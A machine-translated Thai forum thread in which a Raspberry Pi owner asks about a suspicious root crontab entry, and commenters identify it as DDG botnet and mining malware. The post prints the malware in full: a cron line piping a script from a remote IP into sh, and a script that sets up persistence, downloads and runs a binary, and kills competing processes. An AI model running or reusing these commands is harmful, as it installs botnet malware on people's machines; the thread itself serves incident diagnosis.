ฉันต้องการเพิ่มบางอย่างลงในไฟล์ root crontab ของฉันใน Raspberry Pi ของฉันและพบรายการที่น่าสงสัยสำหรับฉันการค้นหาบางส่วนของมันบน Google ไม่ได้ทำอะไรเลย
รายการ Crontab:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
เนื้อหาของhttp://103.219.112.66:8000/i.shคือ:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
ความรู้เกี่ยวกับ Linux ของฉันมี จำกัด แต่สำหรับฉันแล้วดูเหมือนว่าการดาวน์โหลดไบนารีจากเซิร์ฟเวอร์อินโดนีเซียและการเรียกใช้พวกเขาในฐานะที่รูทเป็นประจำไม่ใช่สิ่งที่ปกติ
นี่คืออะไร? ฉันควรทำอย่างไร?
16
มันเป็นวงกลม ทุก 15 นาทีจะดาวน์โหลดและติดตั้งสำเนาใหม่ หาก / เมื่อการคัดลอกบนเซิร์ฟเวอร์ระยะไกลมีการเปลี่ยนแปลงเซิร์ฟเวอร์ทั้งหมดที่ใช้ cronjob นี้จะดำเนินการสิ่งที่รหัสใหม่คือภายใน 15 นาที
—
ไวด์การ์ด
ราสเบอร์รี่ Pi ของคุณเปิดสู่อินเทอร์เน็ตหรือไม่? ราสเบอร์รี่ pi ของคุณทำงานอะไร นี่เป็นผลลัพธ์เดียวใน google เมื่อฉันค้นหา xribfa4 หากคุณไม่ได้ใช้งานซอฟต์แวร์ที่จำเป็นต้องทำสิ่งนี้อาจเป็นไวรัส
—
kemotep
@kemotep สตริงนั้นสุ่ม แต่ google สำหรับ IP และให้ผลลัพธ์เล็กน้อย บางสิ่งบางอย่างเกี่ยวกับการทำเหมืองแร่บ็อตเน็ต DDG
—
frostschutz
เจอแล้ว. มันบ้าที่ IP ลงทะเบียนกับเว็บไซต์รัฐบาลอินโดนีเซีย ดูเหมือนว่ามีเกือบ 2,000 Ips อื่น ๆ ที่ให้น้ำหนักบรรทุกนี้
—
kemotep
สิ่งสำคัญที่คุณต้องระวังคือแม้ว่าคุณจะลบรายการ crontab นั้นระบบของคุณส่วนใหญ่ยังคงมีช่องโหว่ที่อนุญาตให้ติดไวรัส คุณต้องค้นหาและแก้ไขจุดอ่อนนั้น
—
Hans-Martin Mosner